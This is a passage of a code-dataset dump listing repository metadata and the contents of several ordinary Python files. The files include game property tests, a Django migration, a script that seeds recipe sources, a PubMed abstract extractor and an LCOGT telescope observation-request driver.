Dataset columns (type and observed value range):
blob_id: string (length 40)
directory_id: string (length 40)
path: string (length 3 to 288)
content_id: string (length 40)
detected_licenses: list (length 0 to 112)
license_type: string (2 classes)
repo_name: string (length 5 to 115)
snapshot_id: string (length 40)
revision_id: string (length 40)
branch_name: string (684 classes)
visit_date: timestamp[us] (2015-08-06 10:31:46 to 2023-09-06 10:44:38)
revision_date: timestamp[us] (1970-01-01 02:38:32 to 2037-05-03 13:00:00)
committer_date: timestamp[us] (1970-01-01 02:38:32 to 2023-09-06 01:08:06)
github_id: int64 (4.92k to 681M, nullable)
star_events_count: int64 (0 to 209k)
fork_events_count: int64 (0 to 110k)
gha_license_id: string (22 classes)
gha_event_created_at: timestamp[us] (2012-06-04 01:52:49 to 2023-09-14 21:59:50, nullable)
gha_created_at: timestamp[us] (2008-05-22 07:58:19 to 2023-08-21 12:35:19, nullable)
gha_language: string (147 classes)
src_encoding: string (25 classes)
language: string (1 class)
is_vendor: bool (2 classes)
is_generated: bool (2 classes)
length_bytes: int64 (128 to 12.7k)
extension: string (142 classes)
content: string (length 128 to 8.19k)
authors: list (length 1)
author_id: string (length 1 to 132)
db520c55803ce3ffeb97f5b339bc73d74fb711f0
|
cb40aad84a35856ce5a8285ea7260f4183b1dd7a
|
/tests/model/test_properties.py
|
686bc3f6503e24b4cfda6093606dd26cd1f7e118
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
vyahello/trump-bullet-game
|
f71f2fe86a92ba89ea82af5cfecab504b13576d0
|
7648f9722471323ddec1aa6b6d7db38166bebc91
|
refs/heads/master
| 2021-09-08T09:31:49.459350 | 2021-08-29T08:26:14 | 2021-08-29T08:40:40 | 167,864,306 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,974 |
py
|
from typing import Tuple
import pytest
from app.model.properties import GameProperty, Color, Resolution, Border
from app import PropertyError
_rgba_color: Tuple[int, ...] = (1, 2, 3)
_resolution: Tuple[int, ...] = (10, 20)
_bottom: int = 5
def test_property_coordinates() -> None:
assert len(GameProperty.coordinates()) == 4
def test_calculate_jumper() -> None:
assert GameProperty.calculate_jumper() == 50
def test_color_as_rgba(color: Color) -> None:
assert color.as_rgba() == _rgba_color
def test_resolution_as_sequence(resolution: Resolution) -> None:
assert resolution.as_sequence() == _resolution
def test_resolution_top_height(resolution: Resolution) -> None:
assert resolution.top_height == _resolution[0]
def test_resolution_top_width(resolution: Resolution) -> None:
assert resolution.top_width == _resolution[1]
def test_resolution_bottom(resolution: Resolution) -> None:
assert resolution.bottom == _bottom
def test_border_is_top_left(screen_border: Border) -> None:
assert screen_border.is_top_left(10)
def test_border_is_top_right(screen_border: Border) -> None:
assert screen_border.is_top_right(10, 2)
def test_border_is_top_upper(screen_border: Border) -> None:
assert screen_border.is_top_upper(15)
def test_border_is_top_lower(screen_border: Border) -> None:
assert screen_border.is_top_lower(3, -10)
def test_border_is_not_top_left(screen_border: Border) -> None:
assert not screen_border.is_top_left(1)
def test_border_is_not_top_right(screen_border: Border) -> None:
assert not screen_border.is_top_right(30, 3)
def test_border_is_not_top_upper(screen_border: Border) -> None:
assert not screen_border.is_top_upper(1)
def test_border_is_not_top_lower(screen_border: Border) -> None:
assert not screen_border.is_top_lower(15, 2)
def test_resolution_error() -> None:
with pytest.raises(PropertyError):
Resolution(resolution=(0, 0, 0)).as_sequence()
|
[
"[email protected]"
] | |
ba55aa07f86bf85d7f55d854a6d3e64096f4000b
|
d80ef8c716bcc5ea54e87540dbf0463f15bf44ce
|
/libmproxy/contrib/wbxml/InvalidDataException.py
|
67f8ea93014bc2aaf814f9995cc5861007b63caf
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
YagiGo/YPTN
|
5043d22eb131c7164d3fa575f0c4e3d8a963dbf4
|
d7692a68ee1bf578536b4c09c566272210fc8b69
|
refs/heads/master
| 2018-10-16T03:44:18.024169 | 2018-07-24T08:53:57 | 2018-07-24T08:53:57 | 107,633,669 | 4 | 1 |
MIT
| 2018-06-08T09:04:29 | 2017-10-20T04:55:22 |
JavaScript
|
UTF-8
|
Python
| false | false | 1,333 |
py
|
#!/usr/bin/env python
'''
@author: David Shaw, [email protected]
Inspired by EAS Inspector for Fiddler
https://easinspectorforfiddler.codeplex.com
----- The MIT License (MIT) -----
Filename: InvalidDataException.py
Copyright (c) 2014, David P. Shaw
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
class InvalidDataException(Exception):
pass
|
[
"[email protected]"
] | |
243b30d8a04317b70aab7c0bbadabf27a895a4a2
|
480a175ab2b3c012af2d1cddb79674fad1490fe5
|
/0x08-python-more_classes/tests/main.2.py
|
2cb60d1c599573c08cc695829729fe51c64ab27d
|
[] |
no_license
|
ianliu-johnston/holbertonschool-higher_level_programming
|
a8a6476fc6a7ac0bd8ae300f2196f17c13e1b36f
|
f6a7c9cddb2482991c2aadacb99aa66e64eb50eb
|
refs/heads/master
| 2021-04-29T11:12:56.820851 | 2017-05-10T00:48:17 | 2017-05-10T00:48:17 | 77,854,226 | 3 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 944 |
py
|
#!/usr/bin/python3
Rectangle = __import__('2-rectangle').Rectangle
new_rect = Rectangle(3, 4)
print("Dimensions of your new rectangle: {} x {}".format(new_rect.width, new_rect.height))
print("Area: {}".format(new_rect.area()))
print("Perimeter: {}".format(new_rect.perimeter()))
new_rect.width = 5
print("Width just changed. New Dimensions: {} x {}".format(new_rect.width, new_rect.height))
print("Area: {}".format(new_rect.area()))
print("Perimeter: {}".format(new_rect.perimeter()))
new_rect.height = 15
print("height just changed. New Dimensions: {} x {}".format(new_rect.width, new_rect.height))
print("Area: {}".format(new_rect.area()))
print("Perimeter: {}".format(new_rect.perimeter()))
print("Making another one.")
next_rect = Rectangle()
print("Dimensions of your new rectangle: {} x {}".format(next_rect.width, next_rect.height))
print("Area: {}".format(next_rect.area()))
print("Perimeter: {}".format(next_rect.perimeter()))
|
[
"[email protected]"
] | |
702e93ec385bbb5567fec0ac4ca70cf08f9f04db
|
7dbcf66e47684c652f9d90a47b2381cf846e003d
|
/pkg/Conf.py
|
d8e12155528eb0090ab0006f88fcc253282e3ede
|
[] |
no_license
|
hlanSmart/simple
|
531b9a8be524d29c43016c865f64132aa4bf3069
|
c8536edd4cec1f39e23a5ff35ae16f0efa15f323
|
refs/heads/master
| 2020-12-27T08:24:04.383170 | 2016-09-22T04:29:44 | 2016-09-22T04:29:44 | 68,556,669 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,020 |
py
|
#!/usr/bin/python
#coding:utf-8
import os,yaml
BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def readServer(sg, sl=False):  # sg: server group name; sl: when True, return the list of group names
with open(os.path.join(BASE_PATH,'etc/server.yml'),'r') as f:
server = yaml.safe_load(f)  # safe_load: yaml.load without an explicit Loader is deprecated in newer PyYAML
if sl:  # when sl is True, return the group names rather than the group info
li=[]
for i in server:
li.append(i)
return li
if sg in server:
gp=server[sg]  # gp: the server group's info
for i in gp:  # the default port 22 is not stored in the config file, so append it to the result manually
if len(gp[i])<3:
gp[i].append(22)
return gp
return False  # return False when the server group does not exist
def readYaml(P):
try:
with open(P) as f:
return yaml.safe_load(f)
except Exception as e:
print(e)
return False
|
[
"root@localhost"
] |
root@localhost
|
e4d3b1c290b0ee2787f51f3bb625a45c1c113234
|
6daa3815511b1eb1f4ff3a40b7e9332fab38b8ef
|
/tastesavant/taste/apps/profiles/migrations/0010_auto__add_field_profile_preferred_site__chg_field_profile_user.py
|
f631b68b525621e7885479041e53e8ea8b703f7e
|
[] |
no_license
|
kaizensoze/archived-projects
|
76db01309453606e6b7dd9d2ff926cfee42bcb05
|
d39ac099cb40131bac5de66bde7d0e2db5f74189
|
refs/heads/master
| 2021-05-31T12:16:17.800730 | 2016-02-23T00:27:56 | 2016-02-23T00:27:56 | 14,407,212 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,513 |
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Profile.preferred_site'
# The default value, 3, should refer to the NYC site.
db.add_column('profiles_profile', 'preferred_site',
self.gf('django.db.models.fields.related.ForeignKey')(default=3, to=orm['sites.Site']),
keep_default=False)
# Changing field 'Profile.user'
db.alter_column('profiles_profile', 'user_id', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['auth.User'], unique=True))
def backwards(self, orm):
# Deleting field 'Profile.preferred_site'
db.delete_column('profiles_profile', 'preferred_site_id')
# Changing field 'Profile.user'
db.alter_column('profiles_profile', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], unique=True))
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'profiles.friendship': {
'Meta': {'object_name': 'Friendship'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notice_sent_to_user_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'profile': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Profile']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'profiles.profile': {
'Meta': {'object_name': 'Profile'},
'birthday': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'blogger': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'digest_notifications': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'favorite_food': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'favorite_restaurant': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'friends': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'friends'", 'to': "orm['auth.User']", 'through': "orm['profiles.Friendship']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'last_sync_facebook': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_sync_foursquare': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'notification_level': ('django.db.models.fields.CharField', [], {'default': "'instant'", 'max_length': '16'}),
'preferred_site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'type_expert': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'type_reviewer': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}),
'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'zipcode': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['profiles']
|
[
"[email protected]"
] | |
ad784210df07d410b4d9d0b3795e111aa61b9193
|
b7453e5a2700f2017a6f783eaf3990ee2486cd65
|
/test/utils/test_clean_identity.py
|
54c6c0a2df4ef8f53c92989877f93ce940c57635
|
[
"Apache-2.0"
] |
permissive
|
LaRiffle/cleaning-scripts
|
8525164cca8336b67a2362d6907414e27ca088fa
|
08f360721056d30befe8d58ded583a4a5d126184
|
refs/heads/master
| 2020-07-28T06:52:47.673033 | 2019-11-19T15:26:19 | 2019-11-19T15:26:19 | 209,343,798 | 0 | 0 |
Apache-2.0
| 2019-09-20T13:13:25 | 2019-09-18T15:33:16 |
Python
|
UTF-8
|
Python
| false | false | 233 |
py
|
from scripts import utils
def test_clean_identity():
assert utils.clean_identity(None) == ""
assert utils.clean_identity("NaN") == ""
row_input = "Holà chicanos"
assert utils.clean_identity(row_input) == row_input
|
[
"[email protected]"
] | |
1b5cd48ff39ee1da8dbaf2f526d75d0746e5c1e6
|
f1d9df04036fc43c9e5cc7998b83261f4daa94b8
|
/management_commands/insert_base_data.py
|
cf87a7c11fd7db6f4e396e72c0e9d41bce402ce1
|
[] |
no_license
|
Eaterator/web
|
019eb6547995be30b3468e5c44ecc52f05858fb4
|
9c598607f76ad770c66d85c47ffcec05f92f4d66
|
refs/heads/master
| 2021-01-09T20:30:13.417308 | 2017-04-25T02:44:35 | 2017-04-25T02:44:35 | 81,286,177 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,324 |
py
|
from application.auth.models import Role
from application.recipe.models import Source
from application.base_models import db
def insert_role_data():
roles = [
{
'name': 'regular',
'type_': 'consumer',
'is_admin': False
},
{
'name': 'corporate',
'type_': 'business',
'is_admin': False
},
{
'name': 'admin',
'type_': 'admin',
'is_admin': True
}
]
if len(Role.query.all()) > 0:
return
for role in roles:
new_role = Role(**role)
db.session.add(new_role)
db.session.commit()
def insert_source_data():
sources = [
{
'base_url': 'foodnetwork.com',
'name': 'Food Network'
},
{
'base_url': 'epicurious.com',
'name': 'Epicurious'
},
{
'base_url': 'therecipedepository.com',
'name': 'The Recipe Depository',
},
{
'base_url': 'allrecipes.com',
'name': 'All Recipes',
},
{
'base_url': 'bonappetit.com',
'name': 'Bon Appetit'
},
{
'base_url': 'food.com',
'name': 'Food'
},
{
'base_url': 'simplyrecipes.com',
'name': 'Simply Recipes'
},
{
'base_url': 'bbcgoodfood.com',
'name': 'BBC Good Food'
},
{
'base_url': 'williams-sonoma.com',
'name': 'Williams Sonoma'
},
{
'base_url': 'finedininglovers.com',
'name': 'Fine Dining Lovers'
},
{
'base_url': 'thekitchn.com',
'name': 'The Kitchn'
},
{
'base_url': 'chowhound.com',
'name': 'Chow'
},
{
'base_url': 'myrecipes.com',
'name': 'My Recipes'
},
{
'base_url': '',
'name': 'Other'
}
]
for source in sources:
exists = Source.query.filter(Source.name == source['name']).all()
if len(exists) <= 0:
new_source = Source(**source)
db.session.add(new_source)
db.session.commit()
|
[
"[email protected]"
] | |
d74da5f980c51f8a87e1f3491b38cb906651ba91
|
995c52ad5a0a3039ad37a4d2f07b06dcbbcf3961
|
/tantalus/migrations/0059_auto_20180810_1837.py
|
f4ba3f19bfd13e80fa47e558107374b522b8b533
|
[] |
no_license
|
nafabrar/tantalus
|
d02cce3923205191f00b30e80152a0be7c091d6a
|
d8552d40472c29bc617b45a1edaf87c6624b824d
|
refs/heads/master
| 2022-12-24T15:53:52.034999 | 2020-10-07T22:26:35 | 2020-10-07T22:26:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 945 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2018-08-10 18:37
from __future__ import unicode_literals
from django.db import migrations
def populate_sequence_file_info(apps, schema_editor):
FileResource = apps.get_model('tantalus', 'FileResource')
SequenceFileInfo = apps.get_model('tantalus', 'SequenceFileInfo')
for file_resource in FileResource.objects.all():
sequence_file_info = SequenceFileInfo(
file_resource=file_resource,
owner=file_resource.owner,
read_end=file_resource.read_end,
genome_region=file_resource.genome_region,
index_sequence=file_resource.index_sequence,
)
sequence_file_info.save()
class Migration(migrations.Migration):
dependencies = [
('tantalus', '0058_historicalsequencefileinfo_sequencefileinfo'),
]
operations = [
migrations.RunPython(populate_sequence_file_info)
]
|
[
"[email protected]"
] | |
9b9a14f2985d9dd1d7bc6ef666b5d40a2a9a5256
|
a7e0784b697b6c57920e16e2f54ea0ed2225c0e0
|
/data/clingen_raw_to_training.py
|
47d0357cb8921e5915cdc80d02e9879fcf3e88c3
|
[] |
no_license
|
rumeysa77/ClinGenML
|
17e1a3786b8711387a61707252307aab13e682c5
|
c3bf6fbf7d0fe6c1311ce0fcfb4e26d8331bbc7d
|
refs/heads/master
| 2023-03-22T04:41:40.669592 | 2021-02-24T09:04:29 | 2021-02-24T09:04:29 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,815 |
py
|
"""
This file processes the raw excel sheet and extract data
"""
import time
import csv
from collections import defaultdict
from Bio import Entrez
from pathlib import Path
import unicodedata
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
# \t, \n, and \r are technically contorl characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False
# clean text does not tokenize anything!
def clean_text(text):
"""Performs invalid character removal and whitespace cleanup on text."""
output = []
for char in text:
cp = ord(char)
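# drop NUL bytes, U+FFFD replacement characters, and other control characters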
if cp == 0 or cp == 0xfffd or _is_control(char):
continue
if _is_whitespace(char):
output.append(" ")
else:
output.append(char)
return "".join(output)
def reduce_whitespace(text):
return ' '.join(text.split())
major_5_panels = {'experimental-studies', 'allele-data', 'segregation-data', 'specificity-of-phenotype', 'case-control'}
label_vocab = ['experimental-studies', 'allele-data', 'segregation-data', 'specificity-of-phenotype', 'case-control']
class DatasetExtractor(object):
def __init__(self, path=None):
self.major_5_pmid_to_panel = defaultdict(set)
header = None
if path is not None:
with open(path, encoding='utf-8', errors='ignore') as f:
reader = csv.reader(f)
for i, line in enumerate(reader):
if i == 0:
header = line[:-2]
elif line[4] != '': # ClinVar ID cannot be null
if line[1] in major_5_panels:
self.major_5_pmid_to_panel[line[2]].add(line[1])
def fetch_title_abstract_keywords(self, one_id):
ids = one_id
Entrez.email = '[email protected]'
handle = Entrez.efetch(db='pubmed',
retmode='xml',
id=ids)
results = Entrez.read(handle)
# retrieving for only 1 result
for i, paper in enumerate(results['PubmedArticle']):
abstract = []
if 'Abstract' in paper['MedlineCitation']['Article']:
for section in paper['MedlineCitation']['Article']['Abstract']['AbstractText']:
abstract.append(section)
else:
continue
abstract = " ".join(abstract)
title = paper['MedlineCitation']['Article']['ArticleTitle']
keywords = []
for elem in paper['MedlineCitation']['KeywordList']:
for e in elem:
keywords.append(e)
keywords = ' '.join(keywords)
return title, abstract, keywords
return None
def merge_text(self, title, abstract, keywords, entrez=False):
# a standard function to map
text = ''
if not entrez:
text = title + " || " + " ".join(keywords.split('/')) + " || " + reduce_whitespace(clean_text(abstract))
else:
text = title + " || " + keywords + " || " + reduce_whitespace(clean_text(abstract))
return text
def generate_pmid_panel_set(self, log=False, tqdm=False, notebook=False):
# will call Entrez BioPython to grab abstracts
data = []
pmid_to_data = {}
start = time.time()
cnt = 0
for k, v in self.major_5_pmid_to_panel.items():
cnt += 1
res = self.fetch_title_abstract_keywords(k)
if res is None:
continue # 24940364 is not found...
text = self.merge_text(*res)
# label = ['0'] * len(label_vocab)
label = []
for v_i in v:
label.append(str(label_vocab.index(v_i)))
data.append('\t'.join([text, ' '.join(label)]))
pmid_to_data[k] = '\t'.join([text, ' '.join(label)])
if log:
if cnt % 100 == 0:
print(cnt, time.time() - start, 'secs')
return data, pmid_to_data
def write_data_to_csv(self, data, csv_file_path):
# expect `data` directly from `generate_pmid_panel_set`
with open(csv_file_path, encoding='utf-8', errors='ignore', mode='w') as f:
for line in data:
f.write(line + '\n')
def write_pmid_to_list(self, path):
# it will directly save as "pmids.txt", which is what PubMunch expects
# call this function to generate a list of pmid
# so you can use PubMunch to download
p = Path(path)
p.mkdir(exist_ok=True)
with open('{}/pmids.txt'.format(path), 'w') as f:
for pmid in self.major_5_pmid_to_panel.keys():
f.write(pmid + '\n')
def __sub__(self, other):
assert type(other) == type(self)
new_pmids = set(list(self.major_5_pmid_to_panel.keys())) - set(list(other.major_5_pmid_to_panel))
de = DatasetExtractor()
for pmid in new_pmids:
panel = self.major_5_pmid_to_panel[pmid]
de.major_5_pmid_to_panel[pmid] = panel
return de
if __name__ == '__main__':
# testing
de = DatasetExtractor("../corpus/ML Data (as of 3_17_19).csv")
print(de.merge_text(*de.fetch_title_abstract_keywords("10206684")))
|
[
"[email protected]"
] | |
ab0d95439f8363b720d81aa80ae3aa74a0432e28
|
104005986bccea0a4213cbd55d833c95baf2f4fa
|
/drivers/phot_drivers/LCOGT_template_single_request.py
|
c6603728c1e635419c96b9c4a2e6edda588ecfe7
|
[] |
no_license
|
lgbouma/cdips_followup
|
8a92ec9a31b405d316c668a6d42ce10ad47f0501
|
99ac6c6c709f96a58083a5ff7c4cf2d4f0b554a8
|
refs/heads/master
| 2023-08-14T02:33:17.841926 | 2023-08-01T00:46:19 | 2023-08-01T00:46:19 | 206,371,538 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,229 |
py
|
"""
Given a source_id, make LCOGT photometry followup requests, and optionally
submit them to the LCOGT API.
"""
import numpy as np
from astropy.time import Time
from cdips_followup.manage_ephemerides import (
query_ephemeris, get_ephemeris_uncertainty
)
from cdips_followup.LCOGT_dedicated_requests import (
get_dedicated_request,
given_dedicated_requests_validate_submit
)
from astrobase.services.identifiers import tic_to_gaiadr2
TRANSITTYPEDICT = {
'all': ['OIBEO', 'IBEO', 'OIBE', 'OIB', 'BEO'],
'partials': ['OIB', 'BEO'],
'totals': ['OIBEO', 'IBEO', 'OIBE'],
'fulltotals': ['OIBEO']
}
def main():
##########################################
# CHANGE BELOW
savstr = '20230419_tic402980664_23B' # eg, 20191207_TOI1098_request_2m_tc_secondary. "ephemupdate" if it is one. (this cancels pending observations)
overwrite = 1
validate = 0
submit = 0
tic_id = '402980664' # '120105470'
source_id = None # '6113920619134019456' # can use instead of TIC
filtermode = 'ip'# 'zs', 'gp', 'ip'
#telescope_class = '1m0' # '1m0', '2m0', 'special'
telescope_class = 'special' # '1m0', '2m0', 'special'
ipp_value = 1 # usually 1
#max_search_time = Time('2022-12-31 23:59:00')
max_search_time = Time('2024-01-31 23:59:00')
verify_ephemeris_uncertainty = 1 # require t_tra uncertainty < 2 hours
inflate_duration = 0 # if t_tra uncertainty > 1 hour, inflate tdur by +/- 45 minutes per side
transit_type = 'totals' # see above
max_n_events = 99 # else None. n_events is per eventclass.
raise_error = False # raise an error if max_duration_error flag raised.
max_duration_error = 30 # the submitted LCOGT request must match requested durn to within this difference [minutes]
sites = ['Palomar'] # Default None for LCOGT. Could do e.g., 'special' and ['Keck Observatory']
#sites = ['Keck Observatory'] # Default None for LCOGT. Could do e.g., 'special' and ['Keck Observatory']
#sites = ['Cerro Paranal'] # Default None for LCOGT. Could do e.g., 'special' and ['Keck Observatory']
force_acceptability = 50 # None or int.
# CHANGE ABOVE
##########################################
max_airmass_sched = 2.5
manual_ephemeris = False
manual_ephemeris = True # FIXME
create_eventclasses = TRANSITTYPEDICT[transit_type]
submit_eventclasses = TRANSITTYPEDICT[transit_type]
if source_id is None:
assert isinstance(tic_id, str)
source_id = tic_to_gaiadr2(tic_id)
if manual_ephemeris:
period = 18.559/24
period_unc = 0.001/24
epoch = 2457000 + 1791.2972827806442
epoch_unc = 1e-5
duration = 1.04
else:
# get ephemeris from ephemerides.csv
d = query_ephemeris(source_id=source_id)
period, epoch, duration = (
d['period'], d['epoch'], d['duration']
)
period_unc, epoch_unc, duration_unc = (
d['period_unc'], d['epoch_unc'], d['duration_unc']
)
if verify_ephemeris_uncertainty:
delta_t_tra_today = (
get_ephemeris_uncertainty(epoch, epoch_unc, period, period_unc, epoch_obs='today')
)
if delta_t_tra_today*24 < 0:
msg = f'ERR! Got negative ephem unc of {delta_t_tra_today*24:.1f} hr. Need to give a believable ephem unc..'
raise ValueError(msg)
if delta_t_tra_today*24 > 2:
msg = f'ERR! Got ephem unc of {delta_t_tra_today*24:.1f} hr. This is too high.'
raise ValueError(msg)
if delta_t_tra_today*24 > 1:
msg = f'WRN! Got ephem unc of {delta_t_tra_today*24:.1f} hr. This is risky.'
print(msg)
else:
msg = f'INFO! Got ephem unc of {delta_t_tra_today*24:.1f} hr. This is fine.'
print(msg)
if inflate_duration:
assert verify_ephemeris_uncertainty
if delta_t_tra_today*24 > 1:
msg = f'... inflating transit duration for scheduling purposes by 1.5 hours.'
print(msg)
duration += 1.5 # add
# "requests" is a list of lists. Higher level is each eventclass. Level
# below is each event, in that eventclass.
requests = get_dedicated_request(
savstr, source_id, period, epoch, duration, create_eventclasses,
overwrite=overwrite, max_search_time=max_search_time,
filtermode=filtermode, telescope_class=telescope_class,
ipp_value=ipp_value, sites=sites,
force_acceptability=force_acceptability,
max_airmass_sched=max_airmass_sched
)
# if a maximum number of events is set, impose it!
if isinstance(max_n_events, int):
_requests = []
for ix in range(len(create_eventclasses)):
print('starting with {} {} events.'.
format(len(requests[ix]), create_eventclasses[ix])
)
for eventclass in requests:
_eventclass = []
starttimes = []
for req in eventclass:
starttimes.append(req['requests'][0]['windows'][0]['start'])
# sort by start time, cut to get the closest ones.
sort_times = np.sort(starttimes)
sel_times = sort_times[ : max_n_events]
for req in eventclass:
starttime = req['requests'][0]['windows'][0]['start']
if starttime in sel_times:
_eventclass.append(req)
if len(_eventclass) > 0:
_requests.append(_eventclass)
if len(_requests) == 0:
print('WRN!: got no times')
return
assert len(_requests[0]) <= max_n_events
requests = _requests
print('WRN!: trimmed to {} events.'.format(len(requests[0])))
if len(sel_times)>0:
print('WRN!: max time: \n{}'.format(repr(sel_times[-1])))
print('\nWRN!: selected times: \n{}'.format(repr(sel_times)))
else:
print('WRN!: got no times')
given_dedicated_requests_validate_submit(
requests, submit_eventclasses, validate=validate, submit=submit,
max_duration_error=max_duration_error, raise_error=raise_error
)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
10c75430230872f750e9ed2c0a241436c9120a7f
|
b509ef07d752e987f4cb84d1abd4c3a98488a6c7
|
/resources/lib/streamlink/plugins/nownews.py
|
02bd76def1234a8b05929f26bb670853a147f7ba
|
[
"BSD-2-Clause"
] |
permissive
|
Twilight0/script.module.streamlink.base
|
d91245d1a43d6b3191b62a6eb4b1cf70598ed23e
|
c1e4628715a81806586b10323b8cb01424bbb6fc
|
